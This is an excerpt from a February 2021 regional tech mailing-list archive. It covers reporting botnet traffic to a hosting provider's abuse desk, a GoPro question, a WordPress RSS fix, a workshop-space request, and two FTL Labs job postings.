> > Mik > > -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From jwaggoner at micablue.com Fri Feb 19 14:17:25 2021 From: jwaggoner at micablue.com (Julie Waggoner) Date: Fri, 19 Feb 2021 09:17:25 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <205e1001-8f42-9cae-5691-ccb773348252@montaguewebworks.com> Message-ID: ....?dSent from my Verizon, Samsung Galaxy smartphone -------- Original message --------From: Michael Muller via Hidden-discuss Date: 2/19/21 8:37 AM (GMT-05:00) To: Larry Kuttner , hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] Growing Botnet? What the? Bizarre. I've been forwarding the list of attack page requests to the NOC for the IPs I've been finding. The list has been growing every day. And yes, Hetzner is in my list. This is what I got back from them, along with a ticket number: Hi there We received your email. Thanks for writing to us. You have probably realized by now that this is an automated message. We need some time to process each email that we receive, but we will write back to you personally as soon as we can. Thank you for your understanding! Kind regards Your Hetzner Online Team Hetzner Online GmbH Industriestr. 25 91710 Gunzenhausen / Germany Tel.: +49 9831 505-0 Fax: +49 9831 505-3 www.hetzner.com I also sent an abuse email to another host and got this back! 
--- Mik Muller, president Montague WebWorks 239-R Main Street, Greenfield, MA 413-320-5336 http://MontagueWebWorks.com Powered by ROCKETFUSION On 2/17/2021 10:23 AM, Larry Kuttner via Hidden-discuss wrote: Mik-- We have been seeing some of those for a while.? I had submitted an abuse complaint to Hetzner.com and they said that we would need to have our information first be sent to their?customer, which seems ridiculous.?? Their response?was: Thank you for your abuse report. We can only process your report by first forwarding them to our customer. We cannot skip over this step. Your complaint cannot continue forward unless it is first sent to the customer. -- Larry Kuttner Information Technology Manager Northeast Sustainable Energy Association (NESEA) 20 Federal Street, Greenfield, MA 01301 413.774.6051?ext.?12???lkuttner at nesea.org _______________________________________________ Hidden-discuss mailing list - home page: http://www.hidden-tech.net Hidden-discuss at lists.hidden-tech.net You are receiving this because you are on the Hidden-Tech Discussion list. If you would like to change your list preferences, Go to the Members page on the Hidden Tech Web site. http://www.hidden-tech.net/members -------------- next part -------------- An HTML attachment was scrubbed... URL: From jwaggoner at micablue.com Fri Feb 19 15:42:31 2021 From: jwaggoner at micablue.com (Julie Waggoner) Date: Fri, 19 Feb 2021 10:42:31 -0500 Subject: [Hidden-tech] Growing Botnet? In-Reply-To: <20210219151313.E54A17DD65@dmoz.awboc.com> Message-ID: That was an error...not sure why this email was sent. Apologies.?Sent from my Verizon, Samsung Galaxy smartphone -------- Original message --------From: Julie Waggoner via Hidden-discuss Date: 2/19/21 10:13 AM (GMT-05:00) To: Michael Muller , Larry Kuttner , hidden-discuss at lists.hidden-tech.net Subject: Re: [Hidden-tech] Growing Botnet? 
From debchandler411 at gmail.com Tue Feb 23 01:50:42 2021
From: debchandler411 at gmail.com (Deborah Chandler)
Date: Mon, 22 Feb 2021 20:50:42 -0500
Subject: [Hidden-tech] Fwd: * * * Experience with GoPro 9? * * *
In-Reply-To:
References:
Message-ID:

Hi folks,

Just thought I'd check in again and see if anyone has first-hand experience with the GoPro 9.

Thanks,
Deb

---------- Forwarded message ---------
From: Deborah Chandler
Date: Sun, Jan 31, 2021 at 9:14 PM
Subject: * * * Experience with GoPro 9? * * *
To: Hidden-Tech Tech

Hi folks,

A friend is contemplating getting a GoPro 9 for his mobile videography work. Are folks here willing to talk with him about your experience and/or opinion about it? Or are there other video cameras you recommend? He currently has a Sony HandiCam.

If you could provide your contact info, I will pass it along to him. He's looking to buy this very soon.

Thanks!
Deb

From editorial at gonomad.com Tue Feb 23 14:43:20 2021
From: editorial at gonomad.com (Max Hartshorne)
Date: Tue, 23 Feb 2021 09:43:20 -0500 (EST)
Subject: [Hidden-tech] RSS help
Message-ID: <1614091400.160423848@email.rackspace.com>

I've rarely asked for help in the many decades of my HT association.
Boy, I can remember when we used to hold wine parties in my cafe in the early 00s with many of those who still read these missives.

Can someone help me edit my website's RSS feed? https://www.gonomad.com/feed

I send out a daily Mailchimp email using RSS of today's travel story, and it's sending out double images. I have a screenshot of the code that shows the duplicate but I can't find where to edit my own RSS feed in Wordpress. Any help?

-----------------------
Max Hartshorne
Editor
GoNOMAD.com Travel
P.O. Box 4
9 Mountain Rd.
South Deerfield, MA 01373
413-624-6640
www.gonomad.com
Writer's Guidelines: https://www.gonomad.com/3500-writers-guidelines-gonomad-travel
My One minute video about Content Marketing: http://youtu.be/FlH08PisCkg?a

From sam at itabix.com Tue Feb 23 15:04:06 2021
From: sam at itabix.com (Sam McClellan)
Date: Tue, 23 Feb 2021 10:04:06 -0500
Subject: [Hidden-tech] RSS help
In-Reply-To: <1614091400.160423848@email.rackspace.com>
References: <1614091400.160423848@email.rackspace.com>
Message-ID: <6f20938d-4253-1103-098d-3fba8bcd8ac9@itabix.com>

Hi Max,

I've personally never done that, but from what I found you can either edit the feed template or use a plugin like https://wordpress.org/plugins/custom-simple-rss/

https://codex.wordpress.org/Customizing_Feeds

Best,
Sam

Sam McClellan
Itabix, Inc
one place for all things web
sam at itabix.com
https://itabix.com
Main - 413.587.4600
Toll-free - 877-7ITABIX (877.748.2249)

On 2/23/2021 9:43 AM, Max Hartshorne via Hidden-discuss wrote:
>
> I've rarely asked for help in the many decades of my HT association.
> Boy, I can remember when we used to hold wine parties in my cafe in
> the early 00s with many of those who still read these missives.
>
> Can someone help me edit my website's RSS feed?
>
> https://www.gonomad.com/feed
>
> I send out a daily Mailchimp email using RSS of today's travel story,
> and it's sending out double images. I have a screenshot of the code
> that shows the duplicate but I can't find where to edit my own RSS
> feed in Wordpress. Any help?
>
> -----------------------
> Max Hartshorne
> Editor
> GoNOMAD.com Travel
> P.O. Box 4
> 9 Mountain Rd.
> South Deerfield, MA 01373
> 413-624-6640
> www.gonomad.com
> Writer's Guidelines
> My One minute. video about
> Content Marketing

From debchandler411 at gmail.com Tue Feb 23 21:22:46 2021
From: debchandler411 at gmail.com (Deborah Chandler)
Date: Tue, 23 Feb 2021 16:22:46 -0500
Subject: [Hidden-tech] * * * Seeking garage/workshop space ASAP * * *
Message-ID:

Hi folks,

A colleague is seeking a space to do woodwork/machining/etc. in the greater Palmer, Belchertown, Granby, Ware, MA vicinity. If you know of something, please let me know.

Thanks,
Deb

From martha at ftllabscorp.com Wed Feb 24 14:05:24 2021
From: martha at ftllabscorp.com (Martha Marteney)
Date: Wed, 24 Feb 2021 09:05:24 -0500
Subject: [Hidden-tech] JOB: Engineering Software Developer - Second Position
Message-ID:

ABOUT THE POSITION:

FTL Labs in Amherst, MA has recently been awarded an exciting 12 to 18-month program with the US Navy that employs cutting-edge image acquisition, 3D modeling, and artificial intelligence to solve maintenance and readiness challenges. We are seeking a full-time Engineering Software Developer with technical software development skills for desktop and Android platforms to address this specific challenge.

Relevant skills include the following:

* C#, WPF, C++, SQL, Python
* Machine vision, image processing, and target recognition
* 3D graphics, modeling, transforms, and visualization
* Mathematical modelling and algorithms (MATLAB, R)
* Machine learning, neural nets, AI
* Database and cloud architectures
* Visualization and manipulation of large data sets
* Photogrammetry, point clouds, and digitization of physical environments
* Self-motivated and goal oriented
* Fun and easy to work with in a dynamic team
* Bachelor's degree or its equivalent with a minimum of 5 years of experience.

Due to the nature of our work for the U.S. Government, we are required to hire U.S. Citizens. We apologize for not having more hiring flexibility.

$62,000 to $95,000 Annually
401K, Dental, Life, Medical
Full-Time

Work from home will be necessary during COVID distancing restrictions and could be acceptable generally. FTL Labs is in the vibrant intellectual community of western Massachusetts, close to the University of Massachusetts flagship campus and Amherst College. Pay is commensurate with experience. We offer competitive compensation and benefits, including excellent health and dental coverage, short- and long-term disability, life insurance, profit-sharing, and 401k with employer contribution.
During the COVID public health emergency all FTL employees are telecommuting, and we look forward to returning to our office in Amherst when we can ensure it will not endanger the health or safety of our staff.

APPLICATION INSTRUCTIONS:

Please email your resume and 3 references (at least 2 professional contacts) to kristie at ftllabscorp.com and mike at ftllabscorp.com.

ABOUT FTL LABS:

FTL Labs Corporation is a tight-knit association of Ph.D. scientists and seasoned engineers who work to develop next-generation software and technology products to solve problems for government and industrial clients. FTL personnel have participated in Phase I, Phase II, and Phase III Small Business Innovation Research (SBIR) programs through the National Science Foundation, Department of Defense, and NASA, and we strive to transition these technologies to the market. We frequently collaborate with both academic and industry leaders, such as UMass Amherst, Northrop Grumman and Sikorsky. Our work demonstrates innovative thinking in a team setting across a wide range of fields and specialties, including:

* Machine learning, neural nets, and artificial intelligence
* Expertise in optics, ultrasound, image analysis, robotics, and life sciences
* Big data analysis, virtual and augmented reality
* Custom software solutions

FTL Labs is an affirmative action-equal opportunity employer; veterans are encouraged to apply. We comply with all applicable federal, state and local laws regarding recruitment and hiring. All qualified applicants are considered for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, protected veteran status, or any other category protected by applicable federal, state, or local laws.

If you are a creative self-starter, technically innovative, and have excellent writing skills, we want to hear from you!
--
Martha Marteney
She/Her/Hers
Bookkeeper and HR Assistant
--
FTL Labs Corporation
www.ftllabscorp.com
479 West Street Suite 48, Amherst, MA 01002
(413) 992-6075

CONFIDENTIALITY NOTICE: This e-mail communication and any attachments may contain confidential or privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution, or copying of it or its contents is prohibited. If you have received this message in error, please promptly notify the sender or admin at ftllabscorp.com and immediately delete this message and any attachments from your system.

From martha at ftllabscorp.com Wed Feb 24 14:07:42 2021
From: martha at ftllabscorp.com (Martha Marteney)
Date: Wed, 24 Feb 2021 09:07:42 -0500
Subject: [Hidden-tech] JOB: Operations/Project Manager and R&D Marketing Assistant
Message-ID:

ABOUT THE POSITION:

FTL Labs is seeking an Operations/Project Manager and R&D Marketing Assistant who will be responsible for the coordination, growth, and profitability of the company. The person in this role will support and/or oversee multiple business functions, including project and property management, and marketing and communication. The role reports to the Chief Executive Officer (CEO) and has no direct supervisory role.

Job Responsibilities: facilitating management decision processes, resources and operations decisions, and business development tasks such as FTL branding, newsletter, website development and upkeep, and public relations.

Job Duties:

* Create and implement a business and marketing plan
* Manage external relationships and communications with potential commercial customers and partners
* Develop and implement guidelines for internal and external communications, which includes reviewing website and newsletter content, proposals, progress reports, etc.
* Track hardware and software deliverables to ensure contract compliance
* Oversee employee productivity
* Provide direction on staff development strategies
* Ensure compliance with federal requirements for defense contracts, such as property management and cybersecurity protocols
* Oversee FTL patents
* Responsible for keeping various government systems up-to-date, such as SAM

Skills that would be advantageous include, but are not limited to:

* Analytical skills to evaluate data and make operational decisions
* Excellent written and verbal communication skills
* Proficiency in general business software (Microsoft Office, GSuite) and aptitude to learn new applications
* Able to balance big picture thinking with high detail orientation
* Preferred: experience managing government contracts (FAR)

Master's or Bachelor's degree candidates in Management, Business Administration, or related field with a minimum of 3-5 years of experience will be considered.

$?? Per hour (40 hours/week)

Work from home will be necessary during COVID distancing restrictions and could be acceptable generally. FTL Labs is in the vibrant intellectual community of western Massachusetts, close to the University of Massachusetts flagship campus and Amherst College. Pay is commensurate with experience. We offer competitive compensation and benefits, including excellent health and dental coverage, short- and long-term disability, life insurance, profit-sharing, and 401k with employer contribution.

During the COVID public health emergency all FTL employees are telecommuting, and we look forward to returning to our office in Amherst when we can ensure it will not endanger the health or safety of our staff.
APPLICATION INSTRUCTIONS:

Please email your resume and 3 references (at least 2 professional contacts) to FTL's Bookkeeper and HR Assistant, Martha Marteney, at martha at ftllabscorp.com.

ABOUT FTL LABS:

FTL Labs Corporation is a tight-knit association of Ph.D. scientists and seasoned engineers who work to develop next-generation software and technology products to solve problems for government and industrial clients. FTL personnel have participated in Phase I, Phase II, and Phase III Small Business Innovation Research (SBIR) programs through the National Science Foundation, Department of Defense, and NASA, and we strive to transition these technologies to the market. We frequently collaborate with both academic and industry leaders, such as UMass Amherst, Northrop Grumman and Sikorsky. Our work demonstrates innovative thinking in a team setting across a wide range of fields and specialties, including:

* Machine learning, neural nets, and artificial intelligence
* Expertise in optics, ultrasound, image analysis, robotics, and life sciences
* Big data analysis, virtual and augmented reality
* Custom software solutions

FTL Labs is an affirmative action-equal opportunity employer; veterans are encouraged to apply. We comply with all applicable federal, state and local laws regarding recruitment and hiring. All qualified applicants are considered for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, protected veteran status, or any other category protected by applicable federal, state, or local laws.

If you are a creative self-starter, technically innovative, and have excellent writing skills, we want to hear from you!
--
Martha Marteney
She/Her/Hers
Bookkeeper and HR Assistant
--
FTL Labs Corporation
www.ftllabscorp.com
479 West Street Suite 48, Amherst, MA 01002
(413) 992-6075